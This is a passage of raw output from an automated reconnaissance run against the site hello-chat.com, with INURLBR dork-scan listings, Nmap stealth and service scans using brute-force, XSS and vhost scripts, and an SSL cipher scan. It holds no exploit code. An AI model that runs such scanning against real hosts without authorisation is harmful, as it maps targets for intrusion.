3081|_[ + ] Found:: UNIDENTIFIED
3082
3083 _[ - ]::--------------------------------------------------------------------------------------------------------------
3084|_[ + ] [ 89 / 100 ]-[21:16:38] [ - ]
3085|_[ + ] Target:: [ http://hello-chat.com/rank100.html?47 ]
3086|_[ + ] Exploit::
3087|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3088|_[ + ] More details:: / - / , ISP:
3089|_[ + ] Found:: UNIDENTIFIED
3090
3091 _[ - ]::--------------------------------------------------------------------------------------------------------------
3092|_[ + ] [ 90 / 100 ]-[21:16:41] [ - ]
3093|_[ + ] Target:: [ http://hello-chat.com/rank100.html?427 ]
3094|_[ + ] Exploit::
3095|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3096|_[ + ] More details:: / - / , ISP:
3097|_[ + ] Found:: UNIDENTIFIED
3098
3099 _[ - ]::--------------------------------------------------------------------------------------------------------------
3100|_[ + ] [ 91 / 100 ]-[21:16:44] [ - ]
3101|_[ + ] Target:: [ http://hello-chat.com/rank100.html?436 ]
3102|_[ + ] Exploit::
3103|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3104|_[ + ] More details:: / - / , ISP:
3105|_[ + ] Found:: UNIDENTIFIED
3106
3107 _[ - ]::--------------------------------------------------------------------------------------------------------------
3108|_[ + ] [ 92 / 100 ]-[21:16:46] [ - ]
3109|_[ + ] Target:: [ http://hello-chat.com/rank100.html?132 ]
3110|_[ + ] Exploit::
3111|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3112|_[ + ] More details:: / - / , ISP:
3113|_[ + ] Found:: UNIDENTIFIED
3114
3115 _[ - ]::--------------------------------------------------------------------------------------------------------------
3116|_[ + ] [ 93 / 100 ]-[21:16:49] [ - ]
3117|_[ + ] Target:: [ http://hello-chat.com/rank100.html?365 ]
3118|_[ + ] Exploit::
3119|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3120|_[ + ] More details:: / - / , ISP:
3121|_[ + ] Found:: UNIDENTIFIED
3122
3123 _[ - ]::--------------------------------------------------------------------------------------------------------------
3124|_[ + ] [ 94 / 100 ]-[21:16:51] [ - ]
3125|_[ + ] Target:: [ http://hello-chat.com/rank100.html?144 ]
3126|_[ + ] Exploit::
3127|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3128|_[ + ] More details:: / - / , ISP:
3129|_[ + ] Found:: UNIDENTIFIED
3130
3131 _[ - ]::--------------------------------------------------------------------------------------------------------------
3132|_[ + ] [ 95 / 100 ]-[21:16:54] [ - ]
3133|_[ + ] Target:: [ http://hello-chat.com/rank100.html?247 ]
3134|_[ + ] Exploit::
3135|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3136|_[ + ] More details:: / - / , ISP:
3137|_[ + ] Found:: UNIDENTIFIED
3138
3139 _[ - ]::--------------------------------------------------------------------------------------------------------------
3140|_[ + ] [ 96 / 100 ]-[21:16:57] [ - ]
3141|_[ + ] Target:: [ http://hello-chat.com/rank100.html?348 ]
3142|_[ + ] Exploit::
3143|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3144|_[ + ] More details:: / - / , ISP:
3145|_[ + ] Found:: UNIDENTIFIED
3146
3147 _[ - ]::--------------------------------------------------------------------------------------------------------------
3148|_[ + ] [ 97 / 100 ]-[21:16:59] [ - ]
3149|_[ + ] Target:: [ http://hello-chat.com/rank100.html?313 ]
3150|_[ + ] Exploit::
3151|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3152|_[ + ] More details:: / - / , ISP:
3153|_[ + ] Found:: UNIDENTIFIED
3154
3155 _[ - ]::--------------------------------------------------------------------------------------------------------------
3156|_[ + ] [ 98 / 100 ]-[21:17:02] [ - ]
3157|_[ + ] Target:: [ http://hello-chat.com/rank100.html?362 ]
3158|_[ + ] Exploit::
3159|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3160|_[ + ] More details:: / - / , ISP:
3161|_[ + ] Found:: UNIDENTIFIED
3162
3163 _[ - ]::--------------------------------------------------------------------------------------------------------------
3164|_[ + ] [ 99 / 100 ]-[21:17:05] [ - ]
3165|_[ + ] Target:: [ http://hello-chat.com/rank100.html?366 ]
3166|_[ + ] Exploit::
3167|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3168|_[ + ] More details:: / - / , ISP:
3169|_[ + ] Found:: UNIDENTIFIED
3170
3171[ INFO ] [ Shutting down ]
3172[ INFO ] [ End of process INURLBR at [18-03-2020 21:17:05]
3173[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
3174[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/hello-chat.com/output/inurlbr-hello-chat.com ]
3175|_________________________________________________________________________________________
3176
3177\_________________________________________________________________________________________/
3178#################################################################################################################################
3179Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:17 EDT
3180NSE: Loaded 49 scripts for scanning.
3181NSE: Script Pre-scanning.
3182Initiating NSE at 21:17
3183Completed NSE at 21:17, 0.00s elapsed
3184Initiating NSE at 21:17
3185Completed NSE at 21:17, 0.00s elapsed
3186Initiating Ping Scan at 21:17
3187Scanning hello-chat.com (199.38.245.243) [4 ports]
3188Completed Ping Scan at 21:17, 0.28s elapsed (1 total hosts)
3189Initiating Parallel DNS resolution of 1 host. at 21:17
3190Completed Parallel DNS resolution of 1 host. at 21:17, 0.02s elapsed
3191Initiating SYN Stealth Scan at 21:17
3192Scanning hello-chat.com (199.38.245.243) [1 port]
3193Discovered open port 110/tcp on 199.38.245.243
3194Completed SYN Stealth Scan at 21:17, 0.29s elapsed (1 total ports)
3195Initiating Service scan at 21:17
3196Scanning 1 service on hello-chat.com (199.38.245.243)
3197Completed Service scan at 21:17, 0.49s elapsed (1 service on 1 host)
3198Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
3199Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
3200Initiating Traceroute at 21:17
3201Completed Traceroute at 21:17, 3.15s elapsed
3202Initiating Parallel DNS resolution of 10 hosts. at 21:17
3203Completed Parallel DNS resolution of 10 hosts. at 21:17, 0.13s elapsed
3204NSE: Script scanning 199.38.245.243.
3205Initiating NSE at 21:17
3206NSE Timing: About 68.66% done; ETC: 21:18 (0:00:30 remaining)
3207Completed NSE at 21:18, 90.60s elapsed
3208Initiating NSE at 21:18
3209Completed NSE at 21:18, 0.05s elapsed
3210Nmap scan report for hello-chat.com (199.38.245.243)
3211Host is up (0.25s latency).
3212
3213PORT STATE SERVICE VERSION
3214110/tcp open pop3 Dovecot DirectAdmin pop3d
3215|_pop3-capabilities: RESP-CODES PIPELINING UIDL TOP SASL(PLAIN) STLS USER AUTH-RESP-CODE CAPA
3216Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3217Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%), Linux 3.1 - 3.2 (89%)
3218No exact OS matches for host (test conditions non-ideal).
3219Uptime guess: 38.046 days (since Sun Feb 9 19:12:11 2020)
3220Network Distance: 15 hops
3221TCP Sequence Prediction: Difficulty=263 (Good luck!)
3222IP ID Sequence Generation: All zeros
3223
3224TRACEROUTE (using port 110/tcp)
3225HOP RTT ADDRESS
32261 130.72 ms 10.203.41.1
32272 ...
32283 131.35 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
32294 131.30 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
32305 136.76 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
32316 155.34 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
32327 164.44 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
32338 242.02 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
32349 242.85 ms be2099.ccr31.bos01.atlas.cogentco.com (154.54.82.34)
323510 239.05 ms be3471.ccr41.jfk02.atlas.cogentco.com (154.54.40.154)
323611 ... 14
323715 242.07 ms 199.38.245.243
3238
3239NSE: Script Post-scanning.
3240Initiating NSE at 21:18
3241Completed NSE at 21:18, 0.00s elapsed
3242Initiating NSE at 21:18
3243Completed NSE at 21:18, 0.00s elapsed
3244##################################################################################################################################
3245Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 21:19 EDT
3246NSE: Loaded 161 scripts for scanning.
3247NSE: Script Pre-scanning.
3248Initiating NSE at 21:19
3249Completed NSE at 21:19, 0.00s elapsed
3250Initiating NSE at 21:19
3251Completed NSE at 21:19, 0.00s elapsed
3252Initiating Parallel DNS resolution of 1 host. at 21:19
3253Completed Parallel DNS resolution of 1 host. at 21:19, 0.02s elapsed
3254Initiating SYN Stealth Scan at 21:19
3255Scanning hello-chat.com (199.38.245.243) [1 port]
3256Discovered open port 443/tcp on 199.38.245.243
3257Completed SYN Stealth Scan at 21:19, 0.28s elapsed (1 total ports)
3258Initiating Service scan at 21:19
3259Scanning 1 service on hello-chat.com (199.38.245.243)
3260Completed Service scan at 21:19, 14.05s elapsed (1 service on 1 host)
3261Initiating OS detection (try #1) against hello-chat.com (199.38.245.243)
3262Retrying OS detection (try #2) against hello-chat.com (199.38.245.243)
3263Initiating Traceroute at 21:19
3264Completed Traceroute at 21:19, 3.15s elapsed
3265Initiating Parallel DNS resolution of 10 hosts. at 21:19
3266Completed Parallel DNS resolution of 10 hosts. at 21:19, 0.73s elapsed
3267NSE: Script scanning 199.38.245.243.
3268Initiating NSE at 21:19
3269Completed NSE at 21:21, 90.72s elapsed
3270Initiating NSE at 21:21
3271Completed NSE at 21:21, 2.05s elapsed
3272Nmap scan report for hello-chat.com (199.38.245.243)
3273Host is up (0.24s latency).
3274
3275PORT STATE SERVICE VERSION
3276443/tcp open ssl/ssl Apache httpd (SSL-only mode)
3277|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
3278| http-brute:
3279|_ Path "/" does not require authentication
3280|_http-chrono: Request times for /; avg: 1469.94ms; min: 1412.92ms; max: 1551.67ms
3281|_http-csrf: Couldn't find any CSRF vulnerabilities.
3282|_http-date: Thu, 19 Mar 2020 01:25:51 GMT; +6m00s from local time.
3283|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
3284| http-dombased-xss:
3285| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=hello-chat.com
3286| Found the following indications of potential DOM based XSS:
3287|
3288| Source: window.open('','','left='+v56+',top='+v57+',width='+v5f+',height='+v60+',status=no,scrollbars=yes,toolbar=no,location=no,directories=no,menubar=no,resizable=no')
3289|_ Pages: https://hello-chat.com:443/
3290|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
3291| http-errors:
3292| Spidering limited to: maxpagecount=40; withinhost=hello-chat.com
3293| Found the following error pages:
3294|
3295| Error Code: 404
3296|_ https://hello-chat.com:443/%5c'http:/www.andypioneer.com/cgi-bin/rankem.cgi?id=hchat\'
3297|_http-feed: Couldn't find any feeds.
3298|_http-fetch: Please enter the complete path of the directory to save data in.
3299| http-headers:
3300| Date: Thu, 19 Mar 2020 01:25:58 GMT
3301| Server: Apache/2
3302| Last-Modified: Thu, 06 Feb 2020 18:17:54 GMT
3303| ETag: "34b1-59dec4ab1f6c8"
3304| Accept-Ranges: bytes
3305| Content-Length: 13489
3306| Vary: Accept-Encoding,User-Agent
3307| Connection: close
3308| Content-Type: text/html
3309|
3310|_ (Request type: HEAD)
3311|_http-jsonp-detection: Couldn't find any JSONP endpoints.
3312| http-methods:
3313|_ Supported Methods: GET HEAD POST
3314|_http-mobileversion-checker: No mobile version detected.
3315| http-php-version: Logo query returned unknown hash ea5a23e0b33abb753bedccceba90ef14
3316|_Credits query returned unknown hash ea5a23e0b33abb753bedccceba90ef14
3317| http-security-headers:
3318| Strict_Transport_Security:
3319|_ HSTS not configured in HTTPS Server
3320|_http-server-header: Apache/2
3321| http-sitemap-generator:
3322| Directory structure:
3323| /
3324| Other: 1; png: 1
3325| Longest directory structure:
3326| Depth: 0
3327| Dir: /
3328| Total files found (by extension):
3329|_ Other: 1; png: 1
3330|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3331|_http-title: hello-chat.com
3332| http-vhosts:
3333| www2.com : 400
3334| log.com : 400
3335| cdn.com : 400
3336| test1.com : 400
3337| dns1.com : 400
3338| mail3.com : 400
3339| cms.com : 400
3340| ads.com : 400
3341|_119 names had status 200
3342|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
3343|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
3344|_http-xssed: No previously reported XSS vuln.
3345Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3346Aggressive OS guesses: Linux 3.1 (92%), Linux 3.2 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (91%), HP P2000 G3 NAS device (91%), Linux 3.8 (90%), Crestron XPanel control system (90%), Adtran 424RG FTTH gateway (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Linux 2.6.39 - 3.2 (89%)
3347No exact OS matches for host (test conditions non-ideal).
3348Uptime guess: 38.048 days (since Sun Feb 9 19:12:11 2020)
3349Network Distance: 15 hops
3350TCP Sequence Prediction: Difficulty=260 (Good luck!)
3351IP ID Sequence Generation: All zeros
3352
3353TRACEROUTE (using port 443/tcp)
3354HOP RTT ADDRESS
33551 130.66 ms 10.203.41.1
33562 ...
33573 131.32 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
33584 131.28 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
33595 136.46 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
33606 158.95 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
33617 167.28 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
33628 240.65 ms be12266.ccr42.par01.atlas.cogentco.com (154.54.56.174)
33639 238.45 ms be2490.ccr42.jfk02.atlas.cogentco.com (154.54.42.85)
336410 241.03 ms be2262.rcr21.ewr03.atlas.cogentco.com (154.54.47.122)
336511 ... 14
336615 237.54 ms 199.38.245.243
3367
3368NSE: Script Post-scanning.
3369Initiating NSE at 21:21
3370Completed NSE at 21:21, 0.00s elapsed
3371Initiating NSE at 21:21
3372Completed NSE at 21:21, 0.00s elapsed
3373#################################################################################################################################
3374Version: 2.0.0-static
3375OpenSSL 1.1.1e-dev xx XXX xxxx
3376
3377Connected to 199.38.245.243
3378
3379Testing SSL server hello-chat.com on port 443 using SNI name hello-chat.com
3380
3381 SSL/TLS Protocols:
3382SSLv2 disabled
3383SSLv3 disabled
3384TLSv1.0 disabled
3385TLSv1.1 enabled
3386TLSv1.2 enabled
3387TLSv1.3 disabled
3388
3389 TLS Fallback SCSV:
3390Server supports TLS Fallback SCSV
3391
3392 TLS renegotiation:
3393Session renegotiation not supported
3394
3395 TLS Compression:
3396Compression disabled
3397
3398 Heartbleed:
3399TLSv1.2 not vulnerable to heartbleed
3400TLSv1.1 not vulnerable to heartbleed
3401
3402 Supported Server Cipher(s):
3403Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
3404Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
3405Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
3406Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
3407Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
3408Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3409Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
3410Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3411Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
3412Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3413Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
3414Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3415Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3416Accepted TLSv1.2 128 bits AES128-GCM-SHA256
3417Accepted TLSv1.2 256 bits AES256-GCM-SHA384
3418Accepted TLSv1.2 128 bits AES128-SHA256
3419Accepted TLSv1.2 256 bits AES256-SHA256
3420Accepted TLSv1.2 128 bits AES128-SHA
3421Accepted TLSv1.2 256 bits AES256-SHA
3422Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3423Accepted TLSv1.2 256 bits CAMELLIA256-SHA
3424Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3425Accepted TLSv1.2 128 bits CAMELLIA128-SHA
3426Accepted TLSv1.2 112 bits DES-CBC3-SHA
3427Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
3428Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
3429Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
3430Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
3431Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
3432Accepted TLSv1.1 128 bits AES128-SHA
3433Accepted TLSv1.1 256 bits AES256-SHA
3434Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
3435Accepted TLSv1.1 256 bits CAMELLIA256-SHA
3436Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
3437Accepted TLSv1.1 128 bits CAMELLIA128-SHA
3438Accepted TLSv1.1 112 bits DES-CBC3-SHA
3439
3440 Server Key Exchange Group(s):
3441TLSv1.2 128 bits secp256r1 (NIST P-256)
3442
3443 Server Signature Algorithm(s):
3444TLSv1.2 Server accepts all signature algorithms.
3445
3446 SSL Certificate:
3447Signature Algorithm: sha1WithRSAEncryption
3448RSA Key Strength: 2048
3449
3450Subject: localhost
3451Issuer: localhost
3452
3453Not valid before: Jun 4 16:48:56 2019 GMT
3454Not valid after: Oct 19 16:48:56 2046 GMT
3455#################################################################################################################################
3456------------------------------------------------------------------------------------------------------------------------
3457
3458[ ! ] Starting SCANNER INURLBR 2.1 at [18-03-2020 21:29:06]
3459[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
3460It is the end user's responsibility to obey all applicable local, state and federal laws.
3461Developers assume no liability and are not responsible for any misuse or damage caused by this program
3462
3463[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/hello-chat.com/output/inurlbr-hello-chat.com ]
3464[ INFO ][ DORK ]::[ site:hello-chat.com ]
3465[ INFO ][ SEARCHING ]:: {
3466[ INFO ][ ENGINE ]::[ GOOGLE - www.google.com.ec ]
3467
3468[ INFO ][ SEARCHING ]::
3469-[:::]
3470[ INFO ][ ENGINE ]::[ GOOGLE API ]
3471
3472[ INFO ][ SEARCHING ]::
3473-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3474[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sg ID: 005911257635119896548:iiolgmwf2se ]
3475
3476[ INFO ][ SEARCHING ]::
3477-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
3478
3479[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
3480
3481
3482 _[ - ]::--------------------------------------------------------------------------------------------------------------
3483|_[ + ] [ 0 / 100 ]-[21:29:24] [ - ]
3484|_[ + ] Target:: [ http://www.hello-chat.com/ ]
3485|_[ + ] Exploit::
3486|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3487|_[ + ] More details:: / - / , ISP:
3488|_[ + ] Found:: UNIDENTIFIED
3489
3490 _[ - ]::--------------------------------------------------------------------------------------------------------------
3491|_[ + ] [ 1 / 100 ]-[21:29:26] [ - ]
3492|_[ + ] Target:: [ http://hello-chat.com/rank1004.html ]
3493|_[ + ] Exploit::
3494|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3495|_[ + ] More details:: / - / , ISP:
3496|_[ + ] Found:: UNIDENTIFIED
3497
3498 _[ - ]::--------------------------------------------------------------------------------------------------------------
3499|_[ + ] [ 2 / 100 ]-[21:29:28] [ - ]
3500|_[ + ] Target:: [ http://hello-chat.com/rank1003.html ]
3501|_[ + ] Exploit::
3502|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3503|_[ + ] More details:: / - / , ISP:
3504|_[ + ] Found:: UNIDENTIFIED
3505
3506 _[ - ]::--------------------------------------------------------------------------------------------------------------
3507|_[ + ] [ 3 / 100 ]-[21:29:30] [ - ]
3508|_[ + ] Target:: [ http://hello-chat.com/rank1002.html ]
3509|_[ + ] Exploit::
3510|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3511|_[ + ] More details:: / - / , ISP:
3512|_[ + ] Found:: UNIDENTIFIED
3513
3514 _[ - ]::--------------------------------------------------------------------------------------------------------------
3515|_[ + ] [ 4 / 100 ]-[21:29:33] [ - ]
3516|_[ + ] Target:: [ http://hello-chat.com/rank100.html?139 ]
3517|_[ + ] Exploit::
3518|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3519|_[ + ] More details:: / - / , ISP:
3520|_[ + ] Found:: UNIDENTIFIED
3521
3522 _[ - ]::--------------------------------------------------------------------------------------------------------------
3523|_[ + ] [ 5 / 100 ]-[21:29:36] [ - ]
3524|_[ + ] Target:: [ http://hello-chat.com/rank100.html?502 ]
3525|_[ + ] Exploit::
3526|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3527|_[ + ] More details:: / - / , ISP:
3528|_[ + ] Found:: UNIDENTIFIED
3529
3530 _[ - ]::--------------------------------------------------------------------------------------------------------------
3531|_[ + ] [ 6 / 100 ]-[21:29:38] [ - ]
3532|_[ + ] Target:: [ http://hello-chat.com/rank100.html?421 ]
3533|_[ + ] Exploit::
3534|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3535|_[ + ] More details:: / - / , ISP:
3536|_[ + ] Found:: UNIDENTIFIED
3537
3538 _[ - ]::--------------------------------------------------------------------------------------------------------------
3539|_[ + ] [ 7 / 100 ]-[21:29:41] [ - ]
3540|_[ + ] Target:: [ http://hello-chat.com/rank100.html?301 ]
3541|_[ + ] Exploit::
3542|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3543|_[ + ] More details:: / - / , ISP:
3544|_[ + ] Found:: UNIDENTIFIED
3545
3546 _[ - ]::--------------------------------------------------------------------------------------------------------------
3547|_[ + ] [ 8 / 100 ]-[21:29:44] [ - ]
3548|_[ + ] Target:: [ http://hello-chat.com/rank100.html?78 ]
3549|_[ + ] Exploit::
3550|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3551|_[ + ] More details:: / - / , ISP:
3552|_[ + ] Found:: UNIDENTIFIED
3553
3554 _[ - ]::--------------------------------------------------------------------------------------------------------------
3555|_[ + ] [ 9 / 100 ]-[21:29:46] [ - ]
3556|_[ + ] Target:: [ http://hello-chat.com/rank100.html?265 ]
3557|_[ + ] Exploit::
3558|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3559|_[ + ] More details:: / - / , ISP:
3560|_[ + ] Found:: UNIDENTIFIED
3561
3562 _[ - ]::--------------------------------------------------------------------------------------------------------------
3563|_[ + ] [ 10 / 100 ]-[21:29:49] [ - ]
3564|_[ + ] Target:: [ http://hello-chat.com/rank100.html?408 ]
3565|_[ + ] Exploit::
3566|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3567|_[ + ] More details:: / - / , ISP:
3568|_[ + ] Found:: UNIDENTIFIED
3569
3570 _[ - ]::--------------------------------------------------------------------------------------------------------------
3571|_[ + ] [ 11 / 100 ]-[21:29:52] [ - ]
3572|_[ + ] Target:: [ http://hello-chat.com/rank100.html?389 ]
3573|_[ + ] Exploit::
3574|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3575|_[ + ] More details:: / - / , ISP:
3576|_[ + ] Found:: UNIDENTIFIED
3577
3578 _[ - ]::--------------------------------------------------------------------------------------------------------------
3579|_[ + ] [ 12 / 100 ]-[21:29:54] [ - ]
3580|_[ + ] Target:: [ http://hello-chat.com/rank100.html?79 ]
3581|_[ + ] Exploit::
3582|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3583|_[ + ] More details:: / - / , ISP:
3584|_[ + ] Found:: UNIDENTIFIED
3585
3586 _[ - ]::--------------------------------------------------------------------------------------------------------------
3587|_[ + ] [ 13 / 100 ]-[21:29:57] [ - ]
3588|_[ + ] Target:: [ http://hello-chat.com/rank100.html?218 ]
3589|_[ + ] Exploit::
3590|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3591|_[ + ] More details:: / - / , ISP:
3592|_[ + ] Found:: UNIDENTIFIED
3593
3594 _[ - ]::--------------------------------------------------------------------------------------------------------------
3595|_[ + ] [ 14 / 100 ]-[21:30:00] [ - ]
3596|_[ + ] Target:: [ http://hello-chat.com/rank100.html?405 ]
3597|_[ + ] Exploit::
3598|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3599|_[ + ] More details:: / - / , ISP:
3600|_[ + ] Found:: UNIDENTIFIED
3601
3602 _[ - ]::--------------------------------------------------------------------------------------------------------------
3603|_[ + ] [ 15 / 100 ]-[21:30:02] [ - ]
3604|_[ + ] Target:: [ http://hello-chat.com/rank100.html?419 ]
3605|_[ + ] Exploit::
3606|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3607|_[ + ] More details:: / - / , ISP:
3608|_[ + ] Found:: UNIDENTIFIED
3609
3610 _[ - ]::--------------------------------------------------------------------------------------------------------------
3611|_[ + ] [ 16 / 100 ]-[21:30:05] [ - ]
3612|_[ + ] Target:: [ http://hello-chat.com/rank100.html?123 ]
3613|_[ + ] Exploit::
3614|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3615|_[ + ] More details:: / - / , ISP:
3616|_[ + ] Found:: UNIDENTIFIED
3617
3618 _[ - ]::--------------------------------------------------------------------------------------------------------------
3619|_[ + ] [ 17 / 100 ]-[21:30:08] [ - ]
3620|_[ + ] Target:: [ http://hello-chat.com/rank100.html?344 ]
3621|_[ + ] Exploit::
3622|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3623|_[ + ] More details:: / - / , ISP:
3624|_[ + ] Found:: UNIDENTIFIED
3625
3626 _[ - ]::--------------------------------------------------------------------------------------------------------------
3627|_[ + ] [ 18 / 100 ]-[21:30:10] [ - ]
3628|_[ + ] Target:: [ http://hello-chat.com/rank100.html?15 ]
3629|_[ + ] Exploit::
3630|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3631|_[ + ] More details:: / - / , ISP:
3632|_[ + ] Found:: UNIDENTIFIED
3633
3634 _[ - ]::--------------------------------------------------------------------------------------------------------------
3635|_[ + ] [ 19 / 100 ]-[21:30:13] [ - ]
3636|_[ + ] Target:: [ http://hello-chat.com/rank100.html?417 ]
3637|_[ + ] Exploit::
3638|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3639|_[ + ] More details:: / - / , ISP:
3640|_[ + ] Found:: UNIDENTIFIED
3641
3642 _[ - ]::--------------------------------------------------------------------------------------------------------------
3643|_[ + ] [ 20 / 100 ]-[21:30:16] [ - ]
3644|_[ + ] Target:: [ http://hello-chat.com/rank100.html?128 ]
3645|_[ + ] Exploit::
3646|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 , IP:199.38.245.243:80
3647|_[ + ] More details:: / - / , ISP:
3648|_[ + ] Found:: UNIDENTIFIED
3649
3650 _[ - ]::--------------------------------------------------------------------------------------------------------------
3651|_[ + ] [ 21 / 100 ]-[21:30:18] [ - ]
3652|_[ + ] Target:: [ http://hello-chat.com/rank100.html?31 ]
3653|_[ + ] Exploit::
